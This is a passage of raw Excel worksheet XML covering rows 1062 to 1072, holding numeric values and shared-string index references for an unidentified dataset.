    <row r="1062" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1062">
        <v>5095</v>
      </c>
      <c r="B1062" t="s">
        <v>8043</v>
      </c>
      <c r="C1062" t="s">
        <v>129</v>
      </c>
      <c r="D1062" t="s">
        <v>8044</v>
      </c>
      <c r="E1062" t="s">
        <v>49</v>
      </c>
      <c r="F1062" t="s">
        <v>8045</v>
      </c>
      <c r="G1062" s="1">
        <v>44200</v>
      </c>
      <c r="H1062">
        <v>7363</v>
      </c>
      <c r="I1062">
        <v>7363</v>
      </c>
      <c r="J1062">
        <v>0</v>
      </c>
      <c r="K1062">
        <v>0</v>
      </c>
      <c r="L1062">
        <v>0</v>
      </c>
      <c r="M1062">
        <v>0</v>
      </c>
      <c r="N1062">
        <v>0</v>
      </c>
      <c r="O1062">
        <v>0</v>
      </c>
      <c r="P1062">
        <v>0</v>
      </c>
      <c r="Q1062">
        <v>3</v>
      </c>
      <c r="R1062">
        <v>20</v>
      </c>
      <c r="S1062">
        <v>1</v>
      </c>
      <c r="T1062">
        <v>1</v>
      </c>
      <c r="U1062">
        <v>0</v>
      </c>
      <c r="V1062">
        <v>0</v>
      </c>
      <c r="W1062">
        <v>0</v>
      </c>
      <c r="X1062">
        <v>0</v>
      </c>
      <c r="Y1062">
        <v>0</v>
      </c>
      <c r="Z1062">
        <v>0</v>
      </c>
      <c r="AA1062">
        <v>0</v>
      </c>
      <c r="AB1062">
        <v>500</v>
      </c>
      <c r="AC1062">
        <v>100</v>
      </c>
      <c r="AD1062">
        <v>1</v>
      </c>
      <c r="AE1062">
        <v>10000</v>
      </c>
      <c r="AF1062" t="s">
        <v>8046</v>
      </c>
      <c r="AG1062">
        <v>15121</v>
      </c>
      <c r="AH1062">
        <v>11</v>
      </c>
      <c r="AJ1062">
        <v>270</v>
      </c>
      <c r="AK1062" t="s">
        <v>620</v>
      </c>
      <c r="AL1062" t="s">
        <v>2508</v>
      </c>
      <c r="AM1062" t="s">
        <v>8047</v>
      </c>
      <c r="AN1062" t="s">
        <v>55</v>
      </c>
      <c r="AO1062">
        <v>2018</v>
      </c>
      <c r="AP1062">
        <v>81236076887</v>
      </c>
      <c r="AQ1062" t="s">
        <v>8048</v>
      </c>
      <c r="AR1062" t="s">
        <v>8046</v>
      </c>
      <c r="AS1062" t="s">
        <v>57</v>
      </c>
      <c r="AT1062" t="s">
        <v>58</v>
      </c>
      <c r="AU1062">
        <v>26</v>
      </c>
      <c r="AV1062">
        <v>2</v>
      </c>
      <c r="AW1062">
        <v>8</v>
      </c>
      <c r="AX1062">
        <v>0</v>
      </c>
      <c r="AY1062">
        <v>19</v>
      </c>
      <c r="AZ1062">
        <v>2</v>
      </c>
      <c r="BA1062" t="s">
        <v>17577</v>
      </c>
      <c r="BB1062">
        <v>0</v>
      </c>
      <c r="BC1062">
        <v>0</v>
      </c>
      <c r="BD1062" t="s">
        <v>10497</v>
      </c>
    </row>
    <row r="1063" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1063">
        <v>2861</v>
      </c>
      <c r="B1063" t="s">
        <v>8049</v>
      </c>
      <c r="C1063" t="s">
        <v>74</v>
      </c>
      <c r="D1063" t="s">
        <v>8050</v>
      </c>
      <c r="E1063" t="s">
        <v>142</v>
      </c>
      <c r="F1063" t="s">
        <v>666</v>
      </c>
      <c r="G1063" s="1">
        <v>44172</v>
      </c>
      <c r="H1063">
        <v>7377</v>
      </c>
      <c r="I1063">
        <v>7377</v>
      </c>
      <c r="J1063">
        <v>0</v>
      </c>
      <c r="K1063">
        <v>8</v>
      </c>
      <c r="L1063">
        <v>0</v>
      </c>
      <c r="M1063">
        <v>0</v>
      </c>
      <c r="N1063">
        <v>0</v>
      </c>
      <c r="O1063">
        <v>0</v>
      </c>
      <c r="P1063">
        <v>0</v>
      </c>
      <c r="Q1063">
        <v>0</v>
      </c>
      <c r="R1063">
        <v>0</v>
      </c>
      <c r="S1063">
        <v>0</v>
      </c>
      <c r="T1063">
        <v>0</v>
      </c>
      <c r="U1063">
        <v>0</v>
      </c>
      <c r="V1063">
        <v>1700</v>
      </c>
      <c r="W1063">
        <v>0</v>
      </c>
      <c r="X1063">
        <v>0</v>
      </c>
      <c r="Y1063">
        <v>0</v>
      </c>
      <c r="Z1063">
        <v>0</v>
      </c>
      <c r="AA1063">
        <v>0</v>
      </c>
      <c r="AB1063">
        <v>0</v>
      </c>
      <c r="AC1063">
        <v>0</v>
      </c>
      <c r="AD1063">
        <v>0</v>
      </c>
      <c r="AE1063">
        <v>0</v>
      </c>
      <c r="AF1063" t="s">
        <v>8051</v>
      </c>
      <c r="AG1063">
        <v>59185</v>
      </c>
      <c r="AH1063">
        <v>14</v>
      </c>
      <c r="AJ1063">
        <v>205</v>
      </c>
      <c r="AK1063" t="s">
        <v>3221</v>
      </c>
      <c r="AL1063" t="s">
        <v>8052</v>
      </c>
      <c r="AM1063" t="s">
        <v>8053</v>
      </c>
      <c r="AN1063" t="s">
        <v>55</v>
      </c>
      <c r="AO1063">
        <v>2020</v>
      </c>
      <c r="AP1063" t="s">
        <v>8054</v>
      </c>
      <c r="AQ1063" t="s">
        <v>8055</v>
      </c>
      <c r="AR1063" t="s">
        <v>8056</v>
      </c>
      <c r="AS1063" t="s">
        <v>179</v>
      </c>
      <c r="AT1063" t="s">
        <v>58</v>
      </c>
      <c r="AU1063">
        <v>7</v>
      </c>
      <c r="AV1063">
        <v>2</v>
      </c>
      <c r="AW1063">
        <v>21</v>
      </c>
      <c r="AX1063">
        <v>1</v>
      </c>
      <c r="AY1063">
        <v>7</v>
      </c>
      <c r="AZ1063">
        <v>4</v>
      </c>
      <c r="BA1063" t="s">
        <v>17382</v>
      </c>
      <c r="BB1063">
        <v>0</v>
      </c>
      <c r="BC1063" t="s">
        <v>12563</v>
      </c>
      <c r="BD1063">
        <v>0</v>
      </c>
    </row>
    <row r="1064" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1064">
        <v>5120</v>
      </c>
      <c r="B1064" t="s">
        <v>8057</v>
      </c>
      <c r="C1064" t="s">
        <v>1672</v>
      </c>
      <c r="D1064" t="s">
        <v>8058</v>
      </c>
      <c r="E1064" t="s">
        <v>142</v>
      </c>
      <c r="F1064" t="s">
        <v>1746</v>
      </c>
      <c r="G1064" s="1">
        <v>44256</v>
      </c>
      <c r="H1064">
        <v>7384</v>
      </c>
      <c r="I1064">
        <v>7384</v>
      </c>
      <c r="J1064">
        <v>1</v>
      </c>
      <c r="K1064">
        <v>0</v>
      </c>
      <c r="L1064">
        <v>1</v>
      </c>
      <c r="M1064">
        <v>2</v>
      </c>
      <c r="N1064">
        <v>0</v>
      </c>
      <c r="O1064">
        <v>0</v>
      </c>
      <c r="P1064">
        <v>0</v>
      </c>
      <c r="Q1064">
        <v>19</v>
      </c>
      <c r="R1064">
        <v>21</v>
      </c>
      <c r="S1064">
        <v>1</v>
      </c>
      <c r="T1064">
        <v>1</v>
      </c>
      <c r="U1064">
        <v>90000</v>
      </c>
      <c r="V1064">
        <v>0</v>
      </c>
      <c r="W1064">
        <v>1000</v>
      </c>
      <c r="X1064">
        <v>800</v>
      </c>
      <c r="Y1064">
        <v>0</v>
      </c>
      <c r="Z1064">
        <v>0</v>
      </c>
      <c r="AA1064">
        <v>0</v>
      </c>
      <c r="AB1064">
        <v>3800</v>
      </c>
      <c r="AC1064">
        <v>10500</v>
      </c>
      <c r="AD1064">
        <v>1</v>
      </c>
      <c r="AE1064">
        <v>10000</v>
      </c>
      <c r="AF1064" t="s">
        <v>8059</v>
      </c>
      <c r="AG1064">
        <v>70854</v>
      </c>
      <c r="AH1064">
        <v>22</v>
      </c>
      <c r="AJ1064">
        <v>343</v>
      </c>
      <c r="AK1064" t="s">
        <v>1809</v>
      </c>
      <c r="AL1064" t="s">
        <v>1810</v>
      </c>
      <c r="AM1064" t="s">
        <v>8060</v>
      </c>
      <c r="AN1064" t="s">
        <v>55</v>
      </c>
      <c r="AO1064">
        <v>2019</v>
      </c>
      <c r="AP1064">
        <v>85387222478</v>
      </c>
      <c r="AQ1064">
        <v>85387222478</v>
      </c>
      <c r="AR1064" t="s">
        <v>8059</v>
      </c>
      <c r="AS1064" t="s">
        <v>71</v>
      </c>
      <c r="AT1064" t="s">
        <v>58</v>
      </c>
      <c r="AU1064">
        <v>6</v>
      </c>
      <c r="AV1064">
        <v>1</v>
      </c>
      <c r="AW1064">
        <v>25</v>
      </c>
      <c r="AX1064">
        <v>28</v>
      </c>
      <c r="AY1064">
        <v>8</v>
      </c>
      <c r="AZ1064">
        <v>4</v>
      </c>
      <c r="BA1064" t="s">
        <v>17597</v>
      </c>
      <c r="BB1064" t="s">
        <v>16091</v>
      </c>
      <c r="BC1064" t="s">
        <v>12620</v>
      </c>
      <c r="BD1064" t="s">
        <v>12621</v>
      </c>
    </row>
    <row r="1065" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1065">
        <v>5011</v>
      </c>
      <c r="B1065" t="s">
        <v>8061</v>
      </c>
      <c r="C1065" t="s">
        <v>2848</v>
      </c>
      <c r="D1065" t="s">
        <v>8062</v>
      </c>
      <c r="E1065" t="s">
        <v>49</v>
      </c>
      <c r="F1065" t="s">
        <v>1276</v>
      </c>
      <c r="G1065" s="1">
        <v>44188</v>
      </c>
      <c r="H1065">
        <v>7410</v>
      </c>
      <c r="I1065">
        <v>7410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t="s">
        <v>8063</v>
      </c>
      <c r="AG1065">
        <v>30127</v>
      </c>
      <c r="AH1065">
        <v>9</v>
      </c>
      <c r="AJ1065">
        <v>112</v>
      </c>
      <c r="AK1065" t="s">
        <v>8064</v>
      </c>
      <c r="AL1065" t="s">
        <v>8065</v>
      </c>
      <c r="AM1065" t="s">
        <v>8066</v>
      </c>
      <c r="AN1065" t="s">
        <v>68</v>
      </c>
      <c r="AO1065">
        <v>2016</v>
      </c>
      <c r="AP1065">
        <v>8127120033</v>
      </c>
      <c r="AQ1065" t="s">
        <v>8067</v>
      </c>
      <c r="AR1065" t="s">
        <v>8063</v>
      </c>
      <c r="AS1065" t="s">
        <v>71</v>
      </c>
      <c r="AT1065" t="s">
        <v>72</v>
      </c>
      <c r="AU1065">
        <v>26</v>
      </c>
      <c r="AV1065">
        <v>1</v>
      </c>
      <c r="AW1065">
        <v>2</v>
      </c>
      <c r="AX1065">
        <v>2</v>
      </c>
      <c r="AY1065">
        <v>0</v>
      </c>
      <c r="AZ1065">
        <v>0</v>
      </c>
      <c r="BA1065" t="s">
        <v>17538</v>
      </c>
      <c r="BB1065">
        <v>0</v>
      </c>
      <c r="BC1065" t="s">
        <v>12513</v>
      </c>
      <c r="BD1065">
        <v>0</v>
      </c>
    </row>
    <row r="1066" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1066">
        <v>5090</v>
      </c>
      <c r="B1066" t="s">
        <v>8068</v>
      </c>
      <c r="C1066" t="s">
        <v>1672</v>
      </c>
      <c r="D1066" t="s">
        <v>8069</v>
      </c>
      <c r="E1066" t="s">
        <v>644</v>
      </c>
      <c r="F1066" t="s">
        <v>8070</v>
      </c>
      <c r="G1066" s="1">
        <v>44291</v>
      </c>
      <c r="H1066">
        <v>7422</v>
      </c>
      <c r="I1066">
        <v>7422</v>
      </c>
      <c r="J1066">
        <v>0</v>
      </c>
      <c r="K1066">
        <v>1</v>
      </c>
      <c r="L1066">
        <v>0</v>
      </c>
      <c r="M1066">
        <v>0</v>
      </c>
      <c r="N1066">
        <v>0</v>
      </c>
      <c r="O1066">
        <v>0</v>
      </c>
      <c r="P1066">
        <v>0</v>
      </c>
      <c r="Q1066">
        <v>3</v>
      </c>
      <c r="R1066">
        <v>5</v>
      </c>
      <c r="S1066">
        <v>0</v>
      </c>
      <c r="T1066">
        <v>1</v>
      </c>
      <c r="U1066">
        <v>0</v>
      </c>
      <c r="V1066">
        <v>3000</v>
      </c>
      <c r="W1066">
        <v>0</v>
      </c>
      <c r="X1066">
        <v>0</v>
      </c>
      <c r="Y1066">
        <v>0</v>
      </c>
      <c r="Z1066">
        <v>0</v>
      </c>
      <c r="AA1066">
        <v>0</v>
      </c>
      <c r="AB1066">
        <v>2000</v>
      </c>
      <c r="AC1066">
        <v>3000</v>
      </c>
      <c r="AD1066">
        <v>0</v>
      </c>
      <c r="AE1066">
        <v>3000</v>
      </c>
      <c r="AF1066" t="s">
        <v>8071</v>
      </c>
      <c r="AG1066">
        <v>70652</v>
      </c>
      <c r="AH1066">
        <v>22</v>
      </c>
      <c r="AJ1066">
        <v>345</v>
      </c>
      <c r="AK1066" t="s">
        <v>8072</v>
      </c>
      <c r="AL1066" t="s">
        <v>8073</v>
      </c>
      <c r="AM1066" t="s">
        <v>8074</v>
      </c>
      <c r="AN1066" t="s">
        <v>55</v>
      </c>
      <c r="AO1066">
        <v>2017</v>
      </c>
      <c r="AP1066" t="s">
        <v>8075</v>
      </c>
      <c r="AQ1066" t="s">
        <v>8076</v>
      </c>
      <c r="AR1066" t="s">
        <v>8077</v>
      </c>
      <c r="AS1066" t="s">
        <v>71</v>
      </c>
      <c r="AT1066" t="s">
        <v>58</v>
      </c>
      <c r="AU1066">
        <v>6</v>
      </c>
      <c r="AV1066">
        <v>2</v>
      </c>
      <c r="AW1066">
        <v>3</v>
      </c>
      <c r="AX1066">
        <v>0</v>
      </c>
      <c r="AY1066">
        <v>14</v>
      </c>
      <c r="AZ1066">
        <v>2</v>
      </c>
      <c r="BA1066" t="s">
        <v>16751</v>
      </c>
      <c r="BB1066" t="s">
        <v>14827</v>
      </c>
      <c r="BC1066">
        <v>0</v>
      </c>
      <c r="BD1066" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="1067" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1067">
        <v>5113</v>
      </c>
      <c r="B1067" t="s">
        <v>8078</v>
      </c>
      <c r="C1067" t="s">
        <v>157</v>
      </c>
      <c r="D1067" t="s">
        <v>8079</v>
      </c>
      <c r="E1067" t="s">
        <v>8080</v>
      </c>
      <c r="F1067" t="s">
        <v>8081</v>
      </c>
      <c r="G1067" s="1">
        <v>44194</v>
      </c>
      <c r="H1067">
        <v>7445</v>
      </c>
      <c r="I1067">
        <v>7445</v>
      </c>
      <c r="J1067">
        <v>0</v>
      </c>
      <c r="K1067">
        <v>0</v>
      </c>
      <c r="L1067">
        <v>0</v>
      </c>
      <c r="M1067">
        <v>3</v>
      </c>
      <c r="N1067">
        <v>0</v>
      </c>
      <c r="O1067">
        <v>0</v>
      </c>
      <c r="P1067">
        <v>0</v>
      </c>
      <c r="Q1067">
        <v>0</v>
      </c>
      <c r="R1067">
        <v>0</v>
      </c>
      <c r="S1067">
        <v>0</v>
      </c>
      <c r="T1067">
        <v>0</v>
      </c>
      <c r="U1067">
        <v>0</v>
      </c>
      <c r="V1067">
        <v>0</v>
      </c>
      <c r="W1067">
        <v>0</v>
      </c>
      <c r="X1067">
        <v>300</v>
      </c>
      <c r="Y1067">
        <v>0</v>
      </c>
      <c r="Z1067">
        <v>0</v>
      </c>
      <c r="AA1067">
        <v>0</v>
      </c>
      <c r="AB1067">
        <v>0</v>
      </c>
      <c r="AC1067">
        <v>0</v>
      </c>
      <c r="AD1067">
        <v>0</v>
      </c>
      <c r="AE1067">
        <v>0</v>
      </c>
      <c r="AF1067" t="s">
        <v>8082</v>
      </c>
      <c r="AG1067">
        <v>61272</v>
      </c>
      <c r="AH1067">
        <v>16</v>
      </c>
      <c r="AJ1067">
        <v>242</v>
      </c>
      <c r="AK1067" t="s">
        <v>1190</v>
      </c>
      <c r="AL1067" t="s">
        <v>8083</v>
      </c>
      <c r="AM1067" t="s">
        <v>8084</v>
      </c>
      <c r="AN1067" t="s">
        <v>68</v>
      </c>
      <c r="AO1067">
        <v>2004</v>
      </c>
      <c r="AP1067">
        <v>81336638594</v>
      </c>
      <c r="AQ1067" t="s">
        <v>8085</v>
      </c>
      <c r="AR1067" t="s">
        <v>8082</v>
      </c>
      <c r="AS1067" t="s">
        <v>71</v>
      </c>
      <c r="AT1067" t="s">
        <v>72</v>
      </c>
      <c r="AU1067">
        <v>25</v>
      </c>
      <c r="AV1067">
        <v>1</v>
      </c>
      <c r="AW1067">
        <v>0</v>
      </c>
      <c r="AX1067">
        <v>6</v>
      </c>
      <c r="AY1067">
        <v>1</v>
      </c>
      <c r="AZ1067">
        <v>0</v>
      </c>
      <c r="BA1067" t="s">
        <v>17589</v>
      </c>
      <c r="BB1067">
        <v>0</v>
      </c>
      <c r="BC1067" t="s">
        <v>12526</v>
      </c>
      <c r="BD1067">
        <v>0</v>
      </c>
    </row>
    <row r="1068" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1068">
        <v>5125</v>
      </c>
      <c r="B1068" t="s">
        <v>8086</v>
      </c>
      <c r="C1068" t="s">
        <v>168</v>
      </c>
      <c r="D1068" t="s">
        <v>8087</v>
      </c>
      <c r="E1068" t="s">
        <v>49</v>
      </c>
      <c r="F1068" t="s">
        <v>3341</v>
      </c>
      <c r="G1068" s="1">
        <v>44236</v>
      </c>
      <c r="H1068">
        <v>7453</v>
      </c>
      <c r="I1068">
        <v>7453</v>
      </c>
      <c r="J1068">
        <v>0</v>
      </c>
      <c r="K1068">
        <v>0</v>
      </c>
      <c r="L1068">
        <v>0</v>
      </c>
      <c r="M1068">
        <v>0</v>
      </c>
      <c r="N1068">
        <v>0</v>
      </c>
      <c r="O1068">
        <v>0</v>
      </c>
      <c r="P1068">
        <v>0</v>
      </c>
      <c r="Q1068">
        <v>3</v>
      </c>
      <c r="R1068">
        <v>0</v>
      </c>
      <c r="S1068">
        <v>0</v>
      </c>
      <c r="T1068">
        <v>0</v>
      </c>
      <c r="U1068">
        <v>0</v>
      </c>
      <c r="V1068">
        <v>0</v>
      </c>
      <c r="W1068">
        <v>0</v>
      </c>
      <c r="X1068">
        <v>0</v>
      </c>
      <c r="Y1068">
        <v>0</v>
      </c>
      <c r="Z1068">
        <v>0</v>
      </c>
      <c r="AA1068">
        <v>0</v>
      </c>
      <c r="AB1068">
        <v>100</v>
      </c>
      <c r="AC1068">
        <v>0</v>
      </c>
      <c r="AD1068">
        <v>0</v>
      </c>
      <c r="AE1068">
        <v>0</v>
      </c>
      <c r="AF1068" t="s">
        <v>8088</v>
      </c>
      <c r="AG1068">
        <v>40385</v>
      </c>
      <c r="AH1068">
        <v>13</v>
      </c>
      <c r="AJ1068">
        <v>164</v>
      </c>
      <c r="AK1068" t="s">
        <v>8089</v>
      </c>
      <c r="AL1068" t="s">
        <v>8090</v>
      </c>
      <c r="AM1068" t="s">
        <v>8091</v>
      </c>
      <c r="AN1068" t="s">
        <v>68</v>
      </c>
      <c r="AO1068">
        <v>2011</v>
      </c>
      <c r="AP1068">
        <v>85222392220</v>
      </c>
      <c r="AQ1068">
        <v>85222392220</v>
      </c>
      <c r="AR1068" t="s">
        <v>8088</v>
      </c>
      <c r="AS1068" t="s">
        <v>71</v>
      </c>
      <c r="AT1068" t="s">
        <v>72</v>
      </c>
      <c r="AU1068">
        <v>20</v>
      </c>
      <c r="AV1068">
        <v>0</v>
      </c>
      <c r="AW1068">
        <v>0</v>
      </c>
      <c r="AX1068">
        <v>0</v>
      </c>
      <c r="AY1068">
        <v>1</v>
      </c>
      <c r="AZ1068">
        <v>3</v>
      </c>
      <c r="BA1068" t="s">
        <v>17599</v>
      </c>
      <c r="BB1068" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1068" t="s">
        <v>12630</v>
      </c>
      <c r="BD1068">
        <v>0</v>
      </c>
    </row>
    <row r="1069" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1069">
        <v>5103</v>
      </c>
      <c r="B1069" t="s">
        <v>8092</v>
      </c>
      <c r="C1069" t="s">
        <v>199</v>
      </c>
      <c r="D1069" t="s">
        <v>8093</v>
      </c>
      <c r="E1069" t="s">
        <v>142</v>
      </c>
      <c r="F1069" t="s">
        <v>143</v>
      </c>
      <c r="G1069" s="1">
        <v>44193</v>
      </c>
      <c r="H1069">
        <v>7464</v>
      </c>
      <c r="I1069">
        <v>7464</v>
      </c>
      <c r="J1069">
        <v>1</v>
      </c>
      <c r="K1069">
        <v>0</v>
      </c>
      <c r="L1069">
        <v>0</v>
      </c>
      <c r="M1069">
        <v>0</v>
      </c>
      <c r="N1069">
        <v>0</v>
      </c>
      <c r="O1069">
        <v>0</v>
      </c>
      <c r="P1069">
        <v>0</v>
      </c>
      <c r="Q1069">
        <v>0</v>
      </c>
      <c r="R1069">
        <v>0</v>
      </c>
      <c r="S1069">
        <v>0</v>
      </c>
      <c r="T1069">
        <v>0</v>
      </c>
      <c r="U1069">
        <v>120</v>
      </c>
      <c r="V1069">
        <v>0</v>
      </c>
      <c r="W1069">
        <v>0</v>
      </c>
      <c r="X1069">
        <v>0</v>
      </c>
      <c r="Y1069">
        <v>0</v>
      </c>
      <c r="Z1069">
        <v>0</v>
      </c>
      <c r="AA1069">
        <v>0</v>
      </c>
      <c r="AB1069">
        <v>0</v>
      </c>
      <c r="AC1069">
        <v>0</v>
      </c>
      <c r="AD1069">
        <v>0</v>
      </c>
      <c r="AE1069">
        <v>0</v>
      </c>
      <c r="AF1069" t="s">
        <v>8094</v>
      </c>
      <c r="AG1069">
        <v>23231</v>
      </c>
      <c r="AH1069">
        <v>1</v>
      </c>
      <c r="AJ1069">
        <v>19</v>
      </c>
      <c r="AK1069" t="s">
        <v>8095</v>
      </c>
      <c r="AL1069" t="s">
        <v>8096</v>
      </c>
      <c r="AM1069" t="s">
        <v>8097</v>
      </c>
      <c r="AN1069" t="s">
        <v>68</v>
      </c>
      <c r="AO1069">
        <v>2016</v>
      </c>
      <c r="AP1069">
        <v>81323192629</v>
      </c>
      <c r="AQ1069" t="s">
        <v>8098</v>
      </c>
      <c r="AR1069" t="s">
        <v>8099</v>
      </c>
      <c r="AS1069" t="s">
        <v>71</v>
      </c>
      <c r="AT1069" t="s">
        <v>72</v>
      </c>
      <c r="AU1069">
        <v>22</v>
      </c>
      <c r="AV1069">
        <v>0</v>
      </c>
      <c r="AW1069">
        <v>2</v>
      </c>
      <c r="AX1069">
        <v>1</v>
      </c>
      <c r="AY1069">
        <v>4</v>
      </c>
      <c r="AZ1069">
        <v>3</v>
      </c>
      <c r="BA1069" t="s">
        <v>17584</v>
      </c>
      <c r="BB1069">
        <v>0</v>
      </c>
      <c r="BC1069" t="s">
        <v>12718</v>
      </c>
      <c r="BD1069" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1070" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1070">
        <v>5114</v>
      </c>
      <c r="B1070" t="s">
        <v>8100</v>
      </c>
      <c r="C1070" t="s">
        <v>157</v>
      </c>
      <c r="D1070" t="s">
        <v>8101</v>
      </c>
      <c r="E1070" t="s">
        <v>142</v>
      </c>
      <c r="F1070" t="s">
        <v>143</v>
      </c>
      <c r="G1070" s="1">
        <v>44280</v>
      </c>
      <c r="H1070">
        <v>7475</v>
      </c>
      <c r="I1070">
        <v>7475</v>
      </c>
      <c r="J1070">
        <v>0</v>
      </c>
      <c r="K1070">
        <v>0</v>
      </c>
      <c r="L1070">
        <v>0</v>
      </c>
      <c r="M1070">
        <v>4</v>
      </c>
      <c r="N1070">
        <v>0</v>
      </c>
      <c r="O1070">
        <v>0</v>
      </c>
      <c r="P1070">
        <v>0</v>
      </c>
      <c r="Q1070">
        <v>0</v>
      </c>
      <c r="R1070">
        <v>0</v>
      </c>
      <c r="S1070">
        <v>0</v>
      </c>
      <c r="T1070">
        <v>0</v>
      </c>
      <c r="U1070">
        <v>0</v>
      </c>
      <c r="V1070">
        <v>0</v>
      </c>
      <c r="W1070">
        <v>0</v>
      </c>
      <c r="X1070">
        <v>1200</v>
      </c>
      <c r="Y1070">
        <v>0</v>
      </c>
      <c r="Z1070">
        <v>0</v>
      </c>
      <c r="AA1070">
        <v>0</v>
      </c>
      <c r="AB1070">
        <v>0</v>
      </c>
      <c r="AC1070">
        <v>0</v>
      </c>
      <c r="AD1070">
        <v>0</v>
      </c>
      <c r="AE1070">
        <v>0</v>
      </c>
      <c r="AF1070" t="s">
        <v>8102</v>
      </c>
      <c r="AG1070">
        <v>61276</v>
      </c>
      <c r="AH1070">
        <v>16</v>
      </c>
      <c r="AJ1070">
        <v>242</v>
      </c>
      <c r="AK1070" t="s">
        <v>8103</v>
      </c>
      <c r="AL1070" t="s">
        <v>8104</v>
      </c>
      <c r="AM1070" t="s">
        <v>8105</v>
      </c>
      <c r="AN1070" t="s">
        <v>68</v>
      </c>
      <c r="AO1070">
        <v>2010</v>
      </c>
      <c r="AP1070" t="s">
        <v>8106</v>
      </c>
      <c r="AQ1070" t="s">
        <v>8107</v>
      </c>
      <c r="AR1070" t="s">
        <v>8102</v>
      </c>
      <c r="AS1070" t="s">
        <v>71</v>
      </c>
      <c r="AT1070" t="s">
        <v>72</v>
      </c>
      <c r="AU1070">
        <v>25</v>
      </c>
      <c r="AV1070">
        <v>1</v>
      </c>
      <c r="AW1070">
        <v>0</v>
      </c>
      <c r="AX1070">
        <v>4</v>
      </c>
      <c r="AY1070">
        <v>2</v>
      </c>
      <c r="AZ1070">
        <v>2</v>
      </c>
      <c r="BA1070" t="s">
        <v>17590</v>
      </c>
      <c r="BB1070">
        <v>0</v>
      </c>
      <c r="BC1070" t="s">
        <v>12532</v>
      </c>
      <c r="BD1070">
        <v>0</v>
      </c>
    </row>
    <row r="1071" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1071">
        <v>5070</v>
      </c>
      <c r="B1071" t="s">
        <v>6511</v>
      </c>
      <c r="C1071" t="s">
        <v>99</v>
      </c>
      <c r="D1071" t="s">
        <v>8108</v>
      </c>
      <c r="E1071" t="s">
        <v>363</v>
      </c>
      <c r="F1071" t="s">
        <v>8109</v>
      </c>
      <c r="G1071" s="1">
        <v>44194</v>
      </c>
      <c r="H1071">
        <v>7495</v>
      </c>
      <c r="I1071">
        <v>7495</v>
      </c>
      <c r="J1071">
        <v>0</v>
      </c>
      <c r="K1071">
        <v>2</v>
      </c>
      <c r="L1071">
        <v>0</v>
      </c>
      <c r="M1071">
        <v>0</v>
      </c>
      <c r="N1071">
        <v>0</v>
      </c>
      <c r="O1071">
        <v>0</v>
      </c>
      <c r="P1071">
        <v>0</v>
      </c>
      <c r="Q1071">
        <v>0</v>
      </c>
      <c r="R1071">
        <v>0</v>
      </c>
      <c r="S1071">
        <v>0</v>
      </c>
      <c r="T1071">
        <v>0</v>
      </c>
      <c r="U1071">
        <v>0</v>
      </c>
      <c r="V1071">
        <v>75000</v>
      </c>
      <c r="W1071">
        <v>0</v>
      </c>
      <c r="X1071">
        <v>0</v>
      </c>
      <c r="Y1071">
        <v>0</v>
      </c>
      <c r="Z1071">
        <v>0</v>
      </c>
      <c r="AA1071">
        <v>0</v>
      </c>
      <c r="AB1071">
        <v>0</v>
      </c>
      <c r="AC1071">
        <v>0</v>
      </c>
      <c r="AD1071">
        <v>0</v>
      </c>
      <c r="AE1071">
        <v>0</v>
      </c>
      <c r="AF1071" t="s">
        <v>6514</v>
      </c>
      <c r="AG1071">
        <v>10710</v>
      </c>
      <c r="AH1071">
        <v>12</v>
      </c>
      <c r="AJ1071">
        <v>158</v>
      </c>
      <c r="AK1071" t="s">
        <v>8110</v>
      </c>
      <c r="AL1071" t="s">
        <v>8111</v>
      </c>
      <c r="AM1071" t="s">
        <v>8112</v>
      </c>
      <c r="AN1071" t="s">
        <v>68</v>
      </c>
      <c r="AO1071">
        <v>1969</v>
      </c>
      <c r="AP1071" t="s">
        <v>8113</v>
      </c>
      <c r="AQ1071" t="s">
        <v>8114</v>
      </c>
      <c r="AR1071" t="s">
        <v>6010</v>
      </c>
      <c r="AS1071" t="s">
        <v>71</v>
      </c>
      <c r="AT1071" t="s">
        <v>72</v>
      </c>
      <c r="AU1071">
        <v>6</v>
      </c>
      <c r="AV1071">
        <v>0</v>
      </c>
      <c r="AW1071">
        <v>4</v>
      </c>
      <c r="AX1071">
        <v>0</v>
      </c>
      <c r="AY1071">
        <v>4</v>
      </c>
      <c r="AZ1071">
        <v>2</v>
      </c>
      <c r="BA1071" t="s">
        <v>16779</v>
      </c>
      <c r="BB1071" t="s">
        <v>14952</v>
      </c>
      <c r="BC1071">
        <v>0</v>
      </c>
      <c r="BD1071" t="s">
        <v>12537</v>
      </c>
    </row>
    <row r="1072" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1072">
        <v>5112</v>
      </c>
      <c r="B1072" t="s">
        <v>8115</v>
      </c>
      <c r="C1072" t="s">
        <v>2848</v>
      </c>
      <c r="D1072" t="s">
        <v>8116</v>
      </c>
      <c r="E1072" t="s">
        <v>49</v>
      </c>
      <c r="F1072" t="s">
        <v>1276</v>
      </c>
      <c r="G1072" s="1">
        <v>44193</v>
      </c>
      <c r="H1072">
        <v>7507</v>
      </c>
      <c r="I1072">
        <v>7507</v>
      </c>
      <c r="J1072">
        <v>0</v>
      </c>
      <c r="K1072">
        <v>0</v>
      </c>
      <c r="L1072">
        <v>0</v>
      </c>
      <c r="M1072">
        <v>0</v>
      </c>
      <c r="N1072">
        <v>100</v>
      </c>
      <c r="O1072">
        <v>0</v>
      </c>
      <c r="P1072">
        <v>0</v>
      </c>
      <c r="Q1072">
        <v>2</v>
      </c>
      <c r="R1072">
        <v>1</v>
      </c>
      <c r="S1072">
        <v>0</v>
      </c>
      <c r="T1072">
        <v>1</v>
      </c>
      <c r="U1072">
        <v>0</v>
      </c>
      <c r="V1072">
        <v>0</v>
      </c>
      <c r="W1072">
        <v>0</v>
      </c>
      <c r="X1072">
        <v>0</v>
      </c>
      <c r="Y1072">
        <v>0</v>
      </c>
      <c r="Z1072">
        <v>0</v>
      </c>
      <c r="AA1072">
        <v>0</v>
      </c>
